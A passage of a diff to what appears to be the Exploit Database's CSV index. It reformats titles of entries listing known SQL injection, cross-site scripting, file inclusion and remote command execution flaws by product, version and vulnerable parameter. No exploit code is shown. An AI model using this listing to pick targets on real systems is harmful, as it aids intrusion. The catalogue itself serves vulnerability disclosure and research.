Arbitrary Code Execution",2011-06-24,"Zer0 Thunder",windows,remote,0 35882,platforms/php/webapps/35882.txt,"Nodesforum - '_nodesforum_node' Parameter SQL Injection",2011-06-23,"Andrea Bocchetti",php,webapps,0 35883,platforms/php/webapps/35883.txt,"Joomla! 'com_morfeoshow' Component - 'idm' Parameter SQL Injection",2011-06-27,Th3.xin0x,php,webapps,0 @@ -32358,7 +32358,7 @@ id,file,description,date,author,platform,type,port 35894,platforms/php/webapps/35894.txt,"Joomla! CMS 1.6.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-06-28,"Aung Khant",php,webapps,0 35895,platforms/windows/dos/35895.txt,"RealityServer Web Services RTMP Server 3.1.1 build 144525.5 NULL Pointer Dereference Denial Of Service",2011-06-28,"Luigi Auriemma",windows,dos,0 35896,platforms/php/webapps/35896.txt,"FlatPress 0.1010.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-06-28,"High-Tech Bridge SA",php,webapps,0 -35897,platforms/windows/remote/35897.html,"CygniCon CyViewer ActiveX Control 'SaveData()' Insecure Method",2011-06-28,"High-Tech Bridge SA",windows,remote,0 +35897,platforms/windows/remote/35897.html,"CygniCon CyViewer - ActiveX Control 'SaveData()' Insecure Method",2011-06-28,"High-Tech Bridge SA",windows,remote,0 35898,platforms/multiple/remote/35898.php,"Atlassian JIRA 3.13.5 - File Download Security Bypass",2011-06-28,"Ignacio Garrido",multiple,remote,0 35899,platforms/php/webapps/35899.txt,"Mangallam CMS - SQL Injection Web",2015-01-26,Vulnerability-Lab,php,webapps,0 35900,platforms/cgi/webapps/35900.txt,"Barracuda Networks Cloud Series - Filter Bypass",2015-01-26,Vulnerability-Lab,cgi,webapps,0 @@ -32369,12 +32369,12 @@ id,file,description,date,author,platform,type,port 35905,platforms/windows/local/35905.c,"Comodo Backup 4.4.0.0 - NULL Pointer Dereference EOP",2015-01-26,"Parvez Anwar",windows,local,0 35906,platforms/php/webapps/35906.txt,"PHP Webquest 2.6 - SQL Injection",2015-01-26,"jordan root",php,webapps,0 35908,platforms/multiple/webapps/35908.txt,"SWFupload 2.5.0 - Cross Frame Scripting (XFS)",2015-01-26,MindCracker,multiple,webapps,0 -35913,platforms/android/dos/35913.txt,"Android WiFi-Direct Denial of Service",2015-01-26,"Core Security",android,dos,0 +35913,platforms/android/dos/35913.txt,"Android WiFi-Direct - Denial of Service",2015-01-26,"Core Security",android,dos,0 35910,platforms/jsp/webapps/35910.txt,"ManageEngine EventLog Analyzer 9.0 - Directory Traversal / XSS",2015-01-26,"Sepahan TelCom IT Group",jsp,webapps,0 35911,platforms/multiple/webapps/35911.txt,"jclassifiedsmanager - Multiple Vulnerabilities",2015-01-26,"Sarath Nair",multiple,webapps,0 36313,platforms/php/webapps/36313.txt,"webERP 4.3.8 - Multiple Script URI XSS",2011-11-17,"High-Tech Bridge SA",php,webapps,0 35982,platforms/windows/webapps/35982.txt,"Hewlett-Packard UCMDB - JMX-Console Authentication Bypass",2015-02-03,"Hans-Martin Muench",windows,webapps,8080 -35983,platforms/windows/local/35983.rb,"MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape",2015-02-03,Metasploit,windows,local,0 +35983,platforms/windows/local/35983.rb,"Microsoft Remote Desktop Services - Web Proxy IE Sandbox Escape (MS15-004)",2015-02-03,Metasploit,windows,local,0 35988,platforms/php/webapps/35988.txt,"Support Incident Tracker (SiT!) 3.63 p1 - tasks.php selected[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 35989,platforms/php/webapps/35989.txt,"MBoard 1.3 - 'url' Parameter URI Redirection",2011-07-27,"High-Tech Bridge SA",php,webapps,0 35990,platforms/php/webapps/35990.txt,"PHPJunkYard GBook 1.6/1.7 - Multiple Cross-Site Scripting Vulnerabilities",2011-07-27,"High-Tech Bridge SA",php,webapps,0 @@ -32392,8 +32392,8 @@ id,file,description,date,author,platform,type,port 35924,platforms/windows/remote/35924.py,"ClearSCADA - Remote Authentication Bypass Exploit",2015-01-28,"Jeremy Brown",windows,remote,0 35925,platforms/hardware/remote/35925.txt,"Portech MV-372 VoIP Gateway Multiple Security Vulnerabilities",2011-07-05,"Zsolt Imre",hardware,remote,0 35926,platforms/asp/webapps/35926.txt,"eTAWASOL - 'id' Parameter SQL Injection",2011-07-03,Bl4ck.Viper,asp,webapps,0 -35927,platforms/php/webapps/35927.txt,"Classified Script c-BrowseClassified URL Cross-Site Scripting",2011-07-05,"Raghavendra Karthik D",php,webapps,0 -35928,platforms/windows/remote/35928.html,"Pro Softnet IDrive Online Backup 3.4.0 ActiveX SaveToFile() Arbitrary File Overwrite",2011-07-06,"High-Tech Bridge SA",windows,remote,0 +35927,platforms/php/webapps/35927.txt,"Classified Script - c-BrowseClassified URL Cross-Site Scripting",2011-07-05,"Raghavendra Karthik D",php,webapps,0 +35928,platforms/windows/remote/35928.html,"Pro Softnet IDrive Online Backup 3.4.0 - ActiveX SaveToFile() Arbitrary File Overwrite",2011-07-06,"High-Tech Bridge SA",windows,remote,0 35929,platforms/php/webapps/35929.txt,"Joomla! 'com_voj' Component - SQL Injection",2011-07-08,CoBRa_21,php,webapps,0 35930,platforms/php/webapps/35930.txt,"Prontus CMS - 'page' Parameter Cross-Site Scripting",2011-07-11,Zerial,php,webapps,0 35931,platforms/php/webapps/35931.txt,"ICMusic 1.2 - 'music_id' Parameter SQL Injection",2011-07-11,kaMtiEz,php,webapps,0 @@ -32476,7 +32476,7 @@ id,file,description,date,author,platform,type,port 36029,platforms/php/webapps/36029.txt,"u5CMS 3.9.3 - Multiple Stored XSS / Reflected XSS Vulnerabilities",2015-02-09,LiquidWorm,php,webapps,0 36031,platforms/php/webapps/36031.txt,"StaMPi - Local File Inclusion",2015-02-09,"e . V . E . L",php,webapps,0 36058,platforms/php/webapps/36058.txt,"WordPress Video Gallery 2.7.0 Plugin - SQL Injection",2015-02-12,"Claudio Viviani",php,webapps,0 -36032,platforms/php/webapps/36032.txt,"Softbiz Recipes Portal Script Multiple Cross-Site Scripting Vulnerabilities",2011-08-05,Net.Edit0r,php,webapps,0 +36032,platforms/php/webapps/36032.txt,"Softbiz Recipes Portal Script - Multiple Cross-Site Scripting Vulnerabilities",2011-08-05,Net.Edit0r,php,webapps,0 36033,platforms/php/webapps/36033.txt,"Search Network 2.0 - 'query' Parameter Cross-Site Scripting",2011-08-08,darkTR,php,webapps,0 36034,platforms/php/webapps/36034.txt,"OpenEMR 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-09,"Houssam Sahli",php,webapps,0 36035,platforms/php/webapps/36035.txt,"BlueSoft Banner Exchange - 'referer_id' Parameter SQL Injection",2011-08-08,darkTR,php,webapps,0 @@ -32537,7 +32537,7 @@ id,file,description,date,author,platform,type,port 36097,platforms/php/webapps/36097.txt,"Mambo CMS N-Skyrslur Cross-Site Scripting",2011-09-02,CoBRa_21,php,webapps,0 36098,platforms/php/webapps/36098.html,"Guppy CMS 5.0.9 & 5.00.10 Authentication Bypass/Change Email",2015-02-17,"Brandon Murphy",php,webapps,80 36099,platforms/php/webapps/36099.html,"GuppY CMS 5.0.9 & 5.00.10 - Multiple CSRF Vulnerabilities",2015-02-17,"Brandon Murphy",php,webapps,80 -36100,platforms/windows/remote/36100.rb,"X360 VideoPlayer ActiveX Control Buffer Overflow",2015-02-17,Metasploit,windows,remote,0 +36100,platforms/windows/remote/36100.rb,"X360 VideoPlayer - ActiveX Control Buffer Overflow",2015-02-17,Metasploit,windows,remote,0 36101,platforms/java/remote/36101.rb,"Java JMX Server Insecure Configuration Java Code Execution",2015-02-17,Metasploit,java,remote,1617 36102,platforms/php/webapps/36102.txt,"Mambo CMS N-Gallery Component SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 36103,platforms/php/webapps/36103.txt,"Mambo CMS AHS Shop Component SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 @@ -32599,7 +32599,7 @@ id,file,description,date,author,platform,type,port 36162,platforms/php/webapps/36162.txt,"TWiki 5.0.2 bin/view/Main/Jump newtopic Parameter XSS",2011-09-22,"Mesut Timur",php,webapps,0 36163,platforms/php/webapps/36163.txt,"TWiki 5.0.2 SlideShowPlugin Slide Show Pages URI XSS",2011-09-22,"Mesut Timur",php,webapps,0 36164,platforms/php/webapps/36164.txt,"AWStats 6.95/7.0 - 'awredir.pl' Multiple Cross-Site Scripting Vulnerabilities",2011-09-22,MustLive,php,webapps,0 -36165,platforms/php/webapps/36165.txt,"IceWarp Mail Server 10.3.2 server/webmail.php Soap Message Parsing Remote Arbitrary File Disclosure",2011-09-24,"David Kirkpatrick",php,webapps,0 +36165,platforms/php/webapps/36165.txt,"IceWarp Mail Server 10.3.2 server/webmail.php Soap Message Parsing Remote - Arbitrary File Disclosure",2011-09-24,"David Kirkpatrick",php,webapps,0 36166,platforms/php/webapps/36166.txt,"BuddyPress 1.2.10 / WordPress 3.1.x / DEV Blogs Mu 1.2.6 Regular Subscriber - HTML Injection",2011-09-26,knull,php,webapps,0 36167,platforms/php/webapps/36167.txt,"AdaptCMS 2.0.1 - Cross-Site Scripting / Information Disclosure",2011-09-26,"Stefan Schurtz",php,webapps,0 36168,platforms/php/webapps/36168.txt,"Serendipity Freetag-plugin 3.23 - 'serendipity[tagview]' Cross-Site Scripting",2011-09-26,"Stefan Schurtz",php,webapps,0 @@ -32644,7 +32644,7 @@ id,file,description,date,author,platform,type,port 36208,platforms/php/webapps/36208.txt,"vtiger CRM 5.2 - 'onlyforuser' Parameter SQL Injection",2011-10-15,"Aung Khant",php,webapps,0 36209,platforms/windows/remote/36209.html,"Microsoft Internet Explorer 8 - Select Element Memory Corruption",2011-10-11,"Ivan Fratric",windows,remote,0 36262,platforms/windows/webapps/36262.txt,"Solarwinds Orion Service - SQL Injection",2015-03-04,"Brandon Perry",windows,webapps,0 -36263,platforms/linux/remote/36263.rb,"Symantec Web Gateway 5 restore.php Post Authentication Command Injection",2015-03-04,Metasploit,linux,remote,443 +36263,platforms/linux/remote/36263.rb,"Symantec Web Gateway 5 - restore.php Post Authentication Command Injection",2015-03-04,Metasploit,linux,remote,443 36211,platforms/windows/dos/36211.txt,"Microsoft Host Integration Server 2004-2010 - Remote Denial Of Service",2011-04-11,"Luigi Auriemma",windows,dos,0 36244,platforms/php/webapps/36244.txt,"Boonex Dolphin 6.1 - 'xml/get_list.php' SQL Injection",2011-10-19,"Yuri Goltsev",php,webapps,0 36245,platforms/php/webapps/36245.txt,"Innovate Portal 2.0 - 'cat' Parameter Cross-Site Scripting",2011-10-20,"Eyup CELIK",php,webapps,0 @@ -32694,7 +32694,7 @@ id,file,description,date,author,platform,type,port 36258,platforms/windows/remote/36258.txt,"XAMPP 1.7.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-26,Sangteamtham,windows,remote,0 36259,platforms/php/webapps/36259.txt,"eFront 3.6.10 - 'professor.php' Script Multiple SQL Injection",2011-10-28,"Vulnerability Research Laboratory",php,webapps,0 36260,platforms/windows/dos/36260.txt,"Opera Web Browser 11.52 Escape Sequence Stack Buffer Overflow Denial of Service",2011-10-28,"Marcel Bernhardt",windows,dos,0 -36264,platforms/php/remote/36264.rb,"Seagate Business NAS Unauthenticated Remote Command Execution",2015-03-04,Metasploit,php,remote,80 +36264,platforms/php/remote/36264.rb,"Seagate Business NAS - Unauthenticated Remote Command Execution",2015-03-04,Metasploit,php,remote,80 36265,platforms/php/webapps/36265.txt,"BEdita CMS 3.5.0 - Multiple Vulnerabilities",2015-03-04,"Edric Teo",php,webapps,80 36266,platforms/lin_x86-64/dos/36266.c,"Linux Kernel 3.17.5 - IRET Instruction #SS Fault Handling Crash PoC",2015-03-04,"Emeric Nasi",lin_x86-64,dos,0 36267,platforms/linux/dos/36267.c,"Linux Kernel 3.15.6 - PPP-over-L2TP Socket Level Handling Crash PoC",2015-03-04,"Emeric Nasi",linux,dos,0 @@ -32757,7 +32757,7 @@ id,file,description,date,author,platform,type,port 36327,platforms/windows/local/36327.txt,"Microsoft Windows XP/7 Kernel - 'Win32k.sys' Keyboard Layout Local Privilege Escalation",2011-11-22,instruder,windows,local,0 36328,platforms/php/webapps/36328.txt,"TA.CMS - (TeachArabia) index.php id Parameter SQL Injection",2011-11-22,CoBRa_21,php,webapps,0 36329,platforms/php/webapps/36329.txt,"TA.CMS (TeachArabia) lang Parameter Traversal Local File Inclusion",2011-11-22,CoBRa_21,php,webapps,0 -36330,platforms/php/webapps/36330.txt,"Dolibarr 3.1 ERP/CRM Multiple Script URI XSS",2011-11-23,"High-Tech Bridge SA",php,webapps,0 +36330,platforms/php/webapps/36330.txt,"Dolibarr 3.1 ERP/CRM - Multiple Script URI XSS",2011-11-23,"High-Tech Bridge SA",php,webapps,0 36331,platforms/php/webapps/36331.txt,"Dolibarr ERP/CRM /user/index.php Multiple Parameter SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps,0 36332,platforms/php/webapps/36332.txt,"Dolibarr ERP/CRM /user/info.php id Parameter SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps,0 36333,platforms/php/webapps/36333.txt,"Dolibarr ERP/CRM /admin/boxes.php rowid Parameter SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps,0 @@ -32779,7 +32779,7 @@ id,file,description,date,author,platform,type,port 36348,platforms/php/webapps/36348.txt,"Pro Clan Manager 0.4.2 - SQL Injection",2011-11-23,anonymous,php,webapps,0 36349,platforms/php/webapps/36349.txt,"AdaptCMS 2.0 - SQL Injection",2011-11-24,X-Cisadane,php,webapps,0 36350,platforms/php/webapps/36350.txt,"Balitbang CMS 3.3 - index.php hal Parameter SQL Injection",2011-11-24,X-Cisadane,php,webapps,0 -36351,platforms/php/webapps/36351.txt,"alitbang CMS 3.3 alumni.php hal Parameter SQL Injection",2011-11-24,X-Cisadane,php,webapps,0 +36351,platforms/php/webapps/36351.txt,"alitbang CMS 3.3 - alumni.php hal Parameter SQL Injection",2011-11-24,X-Cisadane,php,webapps,0 36352,platforms/linux/remote/36352.txt,"Apache HTTP Server 7.0.x - 'mod_proxy' Reverse Proxy Security Bypass",2011-11-24,"Prutha Parikh",linux,remote,0 36353,platforms/jsp/webapps/36353.txt,"HP Network Node Manager i 9.10 nnm/mibdiscover node Parameter XSS",2011-11-24,anonymous,jsp,webapps,0 36354,platforms/jsp/webapps/36354.txt,"HP Network Node Manager i 9.10 nnm/protected/configurationpoll.jsp nodename Parameter XSS",2011-11-24,anonymous,jsp,webapps,0 @@ -32830,7 +32830,7 @@ id,file,description,date,author,platform,type,port 36407,platforms/php/webapps/36407.txt,"Elxis CMS 2009 - administrator/index.php URI XSS",2011-12-05,"Ewerson Guimaraes",php,webapps,0 36408,platforms/php/webapps/36408.txt,"WordPress Pretty Link Plugin 1.5.2 - 'pretty-bar.php' Cross-Site Scripting",2011-12-06,Am!r,php,webapps,0 36410,platforms/php/webapps/36410.txt,"Simple Machines Forum 1.1.15 - 'fckeditor' Arbitrary File Upload",2011-12-06,HELLBOY,php,webapps,0 -36412,platforms/windows/remote/36412.rb,"IPass Control Pipe Remote Command Execution",2015-03-16,Metasploit,windows,remote,0 +36412,platforms/windows/remote/36412.rb,"IPass Control Pipe - Remote Command Execution",2015-03-16,Metasploit,windows,remote,0 36413,platforms/php/webapps/36413.txt,"WordPress SEO by Yoast 1.7.3.3 Plugin - Blind SQL Injection",2015-03-16,"Ryan Dewhurst",php,webapps,0 36401,platforms/php/webapps/36401.txt,"AtMail 1.04 - 'func' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-12-01,Dognædis,php,webapps,0 36402,platforms/asp/webapps/36402.txt,"Hero 3.69 - 'month' Parameter Cross-Site Scripting",2011-12-01,"Gjoko Krstic",asp,webapps,0 @@ -32854,14 +32854,14 @@ id,file,description,date,author,platform,type,port 36423,platforms/java/webapps/36423.txt,"Websense Appliance Manager Command Injection",2015-03-18,"Han Sahin",java,webapps,9447 36424,platforms/windows/local/36424.txt,"Windows 8.1 - Local WebDAV NTLM Reflection Elevation of Privilege",2015-03-19,"Google Security Research",windows,local,0 36425,platforms/linux/dos/36425.txt,"Linux Kernel 2.6.35 - Network Namespace Remote Denial of Service",2011-12-06,"Serge Hallyn",linux,dos,0 -36426,platforms/multiple/remote/36426.txt,"Apache Struts 2.0.9/2.1.8 Session Tampering Security Bypass",2011-12-07,"Hisato Killing",multiple,remote,0 +36426,platforms/multiple/remote/36426.txt,"Apache Struts 2.0.9/2.1.8 - Session Tampering Security Bypass",2011-12-07,"Hisato Killing",multiple,remote,0 36427,platforms/windows/dos/36427.txt,"PowerDVD 11.0.0.2114 - Remote Denial of Service",2011-12-07,"Luigi Auriemma",windows,dos,0 36428,platforms/hardware/remote/36428.txt,"Axis M10 Series Network Cameras Cross-Site Scripting",2011-12-07,"Matt Metzger",hardware,remote,0 36429,platforms/hardware/remote/36429.txt,"HomeSeer HS2 2.5.0.20 Web Interface Log Viewer Page URI XSS",2011-12-08,"Silent Dream",hardware,remote,0 36430,platforms/linux/local/36430.sh,"HP Application Lifestyle Management 11 - 'GetInstalledPackages' Local Privilege Escalation",2011-12-08,anonymous,linux,local,0 36431,platforms/windows/dos/36431.pl,"FastStone Image Viewer 5.3 - (.tga) Crash PoC",2015-03-19,"ITDefensor Vulnerability Research Team",windows,dos,0 36432,platforms/php/webapps/36432.txt,"Pet Listing - 'preview.php' Cross-Site Scripting",2011-12-09,Mr.PaPaRoSSe,php,webapps,0 -36433,platforms/windows/dos/36433.txt,"Yahoo! CD Player ActiveX Control 'open()' Method Stack Buffer Overflow",2011-04-20,shinnai,windows,dos,0 +36433,platforms/windows/dos/36433.txt,"Yahoo! CD Player - ActiveX Control 'open()' Method Stack Buffer Overflow",2011-04-20,shinnai,windows,dos,0 36434,platforms/php/webapps/36434.txt,"WordPress GRAND FlAGallery Plugin 1.57 - 'flagshow.php' Cross-Site Scripting",2011-12-12,Am!r,php,webapps,0 36435,platforms/php/webapps/36435.txt,"Chamilo LMS 1.9.10 - Multiple Vulnerabilities",2015-03-19,"Rehan Ahmed",php,webapps,80 36436,platforms/java/webapps/36436.txt,"EMC M&R (Watch4net) - Credential Disclosure",2015-03-19,"Han Sahin",java,webapps,0 @@ -33063,7 +33063,7 @@ id,file,description,date,author,platform,type,port 36648,platforms/php/webapps/36648.txt,"OpenEMR 4.1 interface/patient_file/encounter/trend_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 36649,platforms/php/webapps/36649.txt,"OpenEMR 4.1 interface/patient_file/encounter/load_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 36650,platforms/php/webapps/36650.txt,"OpenEMR 4.1 contrib/acog/print_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 -36651,platforms/php/webapps/36651.txt,"OpenEMR 4.1 interface/fax/fax_dispatch.php file Parameter exec() Call Arbitrary Shell Command Execution",2012-02-01,"High-Tech Bridge SA",php,webapps,0 +36651,platforms/php/webapps/36651.txt,"OpenEMR 4.1 interface/fax/fax_dispatch.php file Parameter exec() Call - Arbitrary Shell Command Execution",2012-02-01,"High-Tech Bridge SA",php,webapps,0 36652,platforms/multiple/remote/36652.py,"w3tw0rk / Pitbull Perl IRC Bot Remote Code Execution PoC Exploit",2015-04-06,"Jay Turla",multiple,remote,6667 36653,platforms/jsp/remote/36653.rb,"JBoss Seam 2 - File Upload and Execute",2015-04-06,Metasploit,jsp,remote,8080 36654,platforms/php/webapps/36654.txt,"phpLDAPadmin 1.2.2 - 'base' Parameter Cross-Site Scripting",2012-02-01,andsarmiento,php,webapps,0 @@ -33074,7 +33074,7 @@ id,file,description,date,author,platform,type,port 36659,platforms/php/webapps/36659.txt,"Joomla! Currency Converter Component - 'from' Parameter Cross-Site Scripting",2012-02-02,"BHG Security Center",php,webapps,0 36660,platforms/php/webapps/36660.txt,"project-open 3.4.x - 'account-closed.tcl' Cross-Site Scripting",2012-02-03,"Michail Poultsakis",php,webapps,0 36661,platforms/php/webapps/36661.txt,"PHP-Fusion 7.2.4 - 'weblink_id' Parameter SQL Injection",2012-02-03,Am!r,php,webapps,0 -36662,platforms/windows/dos/36662.txt,"Edraw Diagram Component 5 ActiveX Control 'LicenseName()' Method Buffer Overflow",2012-02-06,"Senator of Pirates",windows,dos,0 +36662,platforms/windows/dos/36662.txt,"Edraw Diagram Component 5 - ActiveX Control 'LicenseName()' Method Buffer Overflow",2012-02-06,"Senator of Pirates",windows,dos,0 36663,platforms/linux/remote/36663.txt,"Apache HTTP Server 2.2.15 - 'mod_proxy' Reverse Proxy Security Bypass",2012-02-06,"Tomas Hoger",linux,remote,0 36664,platforms/php/webapps/36664.txt,"Vespa 0.8.6 - 'getid3.php' Local File Inclusion",2012-02-06,T0x!c,php,webapps,0 36665,platforms/php/webapps/36665.txt,"Simple Groupware 0.742 - 'export' Parameter Cross-Site Scripting",2012-02-07,"Infoserve Security Team",php,webapps,0 @@ -33099,11 +33099,11 @@ id,file,description,date,author,platform,type,port 36684,platforms/java/webapps/36684.txt,"LxCenter Kloxo 6.1.10 - Multiple HTML Injection Vulnerabilities",2012-02-10,anonymous,java,webapps,0 36685,platforms/php/webapps/36685.txt,"CubeCart 3.0.20 - Multiple Script redir Parameter Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0 36686,platforms/php/webapps/36686.txt,"CubeCart 3.0.20 - admin/login.php goto Parameter Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0 -36687,platforms/php/webapps/36687.txt,"CubeCart 3.0.20 switch.php r Parameter Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0 +36687,platforms/php/webapps/36687.txt,"CubeCart 3.0.20 switch.php r Parameter - Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0 36688,platforms/php/webapps/36688.html,"Zen Cart 1.3.9h - 'path_to_admin/product.php' Cross-Site Request Forgery",2012-02-10,DisK0nn3cT,php,webapps,0 36689,platforms/linux/webapps/36689.txt,"BOA Web Server 0.94.8.2 - Arbitrary File Access",2000-12-19,llmora,linux,webapps,0 36690,platforms/linux/remote/36690.rb,"Barracuda Firmware 5.0.0.012 - Post Auth Remote Root exploit (Metasploit)",2015-04-09,xort,linux,remote,8000 -36691,platforms/php/webapps/36691.txt,"WordPress Windows Desktop and iPhone Photo Uploader Plugin Arbitrary File Upload",2015-04-09,"Manish Tanwar",php,webapps,80 +36691,platforms/php/webapps/36691.txt,"WordPress Windows Desktop and iPhone Photo Uploader Plugin - Arbitrary File Upload",2015-04-09,"Manish Tanwar",php,webapps,80 36692,platforms/osx/local/36692.py,"Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - 'Rootpipe' Privilege Escalation",2015-04-09,"Emil Kvarnhammar",osx,local,0 36693,platforms/php/webapps/36693.txt,"RabbitWiki - 'title' Parameter Cross-Site Scripting",2012-02-10,sonyy,php,webapps,0 36694,platforms/php/webapps/36694.txt,"eFront Community++ 3.6.10 - SQL Injection and Multiple HTML Injection Vulnerabilities",2012-02-12,"Benjamin Kunz Mejri",php,webapps,0 @@ -33247,7 +33247,7 @@ id,file,description,date,author,platform,type,port 36842,platforms/php/webapps/36842.pl,"OTRS < 3.1.x / < 3.2.x / < 3.3.x - Stored Cross-Site Scripting",2015-04-27,"Adam Ziaja",php,webapps,0 36994,platforms/cgi/webapps/36994.txt,"WebGlimpse 2.18.7 - 'DOC' Parameter Directory Traversal",2009-04-17,MustLive,cgi,webapps,0 36995,platforms/hardware/remote/36995.txt,"F5 FirePass 7.0 - SQL Injection",2012-03-14,anonymous,hardware,remote,0 -37169,platforms/linux/remote/37169.rb,"Realtek SDK Miniigd UPnP SOAP Command Execution",2015-06-01,Metasploit,linux,remote,52869 +37169,platforms/linux/remote/37169.rb,"Realtek SDK - Miniigd UPnP SOAP Command Execution",2015-06-01,Metasploit,linux,remote,52869 37065,platforms/windows/local/37065.txt,"Comodo GeekBuddy < 4.18.121 - Local Privilege Escalation",2015-05-20,"Jeremy Brown",windows,local,0 36847,platforms/windows/dos/36847.py,"i.FTP 2.21 - SEH Overflow Crash PoC",2015-04-28,"Avinash Thapa",windows,dos,0 36853,platforms/php/webapps/36853.txt,"Dolphin 7.0.x - viewFriends.php Multiple Parameter XSS",2012-02-21,"Aung Khant",php,webapps,0 @@ -33261,9 +33261,9 @@ id,file,description,date,author,platform,type,port 36861,platforms/windows/webapps/36861.txt,"Wing FTP Server Admin 4.4.5 - Multiple Vulnerabilities",2015-04-29,hyp3rlinx,windows,webapps,5466 36862,platforms/php/webapps/36862.txt,"OS Solution OSProperty 2.8.0 - SQL Injection",2015-04-29,"Brandon Perry",php,webapps,80 36863,platforms/php/webapps/36863.txt,"Joomla Machine Component - Multiple SQL Injection",2012-02-20,the_cyber_nuxbie,php,webapps,0 -36864,platforms/hardware/remote/36864.txt,"Xavi 7968 ADSL Router Multiple Function CSRF",2012-02-21,Busindre,hardware,remote,0 -36865,platforms/hardware/remote/36865.txt,"Xavi 7968 ADSL Router webconfig/lan/lan_config.html/local_lan_config host_name_txtbox Parameter XSS",2012-02-21,Busindre,hardware,remote,0 -36866,platforms/hardware/remote/36866.txt,"Xavi 7968 ADSL Router webconfig/wan/confirm.html/confirm pvcName Parameter XSS",2012-02-21,Busindre,hardware,remote,0 +36864,platforms/hardware/remote/36864.txt,"Xavi 7968 ADSL Router - Multiple Function CSRF",2012-02-21,Busindre,hardware,remote,0 +36865,platforms/hardware/remote/36865.txt,"Xavi 7968 ADSL Router - webconfig/lan/lan_config.html/local_lan_config host_name_txtbox Parameter XSS",2012-02-21,Busindre,hardware,remote,0 +36866,platforms/hardware/remote/36866.txt,"Xavi 7968 ADSL Router - webconfig/wan/confirm.html/confirm pvcName Parameter XSS",2012-02-21,Busindre,hardware,remote,0 36867,platforms/php/webapps/36867.txt,"CPG Dragonfly CMS 9.3.3.0 - Multiple Multiple Cross-Site Scripting Vulnerabilities",2012-02-21,Ariko-Security,php,webapps,0 36868,platforms/hardware/dos/36868.pl,"Mercury MR804 Router Multiple HTTP Header Fields Denial Of Service Vulnerabilities",2012-02-21,demonalex,hardware,dos,0 36869,platforms/multiple/dos/36869.txt,"IBM solidDB 6.5.0.8 - 'SELECT' Statement 'WHERE' Condition Denial of Service",2012-02-09,IBM,multiple,dos,0 @@ -33314,7 +33314,7 @@ id,file,description,date,author,platform,type,port 36907,platforms/php/webapps/36907.txt,"WordPress Ultimate Product Catalogue 3.1.2 Plugin - Multiple Persistent XSS / CSRF / File Upload",2015-05-04,"Felipe Molina",php,webapps,0 36908,platforms/lin_x86/shellcode/36908.c,"Linux/x86 - exit(0) shellcode (6 bytes)",2015-05-04,"Febriyanto Nugroho",lin_x86,shellcode,0 36965,platforms/php/webapps/36965.txt,"Omnistar Live Cross-Site Scripting and SQL Injection",2012-03-13,sonyy,php,webapps,0 -36966,platforms/linux/local/36966.txt,"LightDM 1.0.6 Arbitrary File Deletion",2012-03-13,"Ryan Lortie",linux,local,0 +36966,platforms/linux/local/36966.txt,"LightDM 1.0.6 - Arbitrary File Deletion",2012-03-13,"Ryan Lortie",linux,local,0 36967,platforms/php/webapps/36967.txt,"Max's Guestbook 1.0 - Multiple Remote Vulnerabilities",2012-03-14,n0tch,php,webapps,0 36968,platforms/php/webapps/36968.txt,"Max's PHP Photo Album 1.0 - 'id' Parameter Local File Inclusion",2012-03-14,n0tch,php,webapps,0 36969,platforms/windows/dos/36969.txt,"Citrix 11.6.1 Licensing Administration Console Denial of Service",2012-03-15,Rune,windows,dos,0 @@ -33361,7 +33361,7 @@ id,file,description,date,author,platform,type,port 36961,platforms/php/webapps/36961.txt,"WordPress Ad Inserter Plugin 1.5.2 - CSRF",2015-05-08,"Kaustubh G. Padwad",php,webapps,80 36962,platforms/windows/remote/36962.rb,"Adobe Flash Player - NetConnection Type Confusion",2015-05-08,Metasploit,windows,remote,0 36963,platforms/linux/webapps/36963.txt,"Alienvault OSSIM/USM 4.14/4.15/5.0 - Multiple Vulnerabilities",2015-05-08,"Peter Lapp",linux,webapps,0 -36964,platforms/java/remote/36964.rb,"Novell ZENworks Configuration Management Arbitrary File Upload",2015-05-08,Metasploit,java,remote,443 +36964,platforms/java/remote/36964.rb,"Novell ZENworks Configuration Management - Arbitrary File Upload",2015-05-08,Metasploit,java,remote,443 36974,platforms/cgi/webapps/36974.txt,"WebGlimpse 2.14.1/2.18.8 - 'webglimpse.cgi' Remote Command Injection",2012-03-20,"Kevin Perry",cgi,webapps,0 36975,platforms/php/webapps/36975.txt,"ClassifiedsGeek.com Vacation Packages - 'listing_search' Parameter SQL Injection",2012-03-19,r45c4l,php,webapps,0 36976,platforms/cgi/webapps/36976.txt,"WebGlimpse 2.x - 'wgarcmin.cgi' Path Disclosure",2012-03-18,Websecurity,cgi,webapps,0 @@ -33418,7 +33418,7 @@ id,file,description,date,author,platform,type,port 37031,platforms/java/webapps/37031.txt,"ManageEngine Firewall Analyzer 7.2 fw/mindex.do url Parameter XSS",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0 37032,platforms/java/webapps/37032.txt,"ManageEngine Firewall Analyzer 7.2 fw/syslogViewer.do port Parameter XSS",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0 37033,platforms/java/webapps/37033.txt,"JBMC Software DirectAdmin 1.403 - 'domain' Parameter Cross-Site Scripting",2012-04-02,"Dawid Golak",java,webapps,0 -37034,platforms/php/webapps/37034.txt,"FlatnuX CMS controlcenter.php contents/Files Action dir Parameter Traversal Arbitrary File Access",2012-04-01,"Vulnerability Laboratory",php,webapps,0 +37034,platforms/php/webapps/37034.txt,"FlatnuX CMS controlcenter.php contents/Files Action dir Parameter Traversal 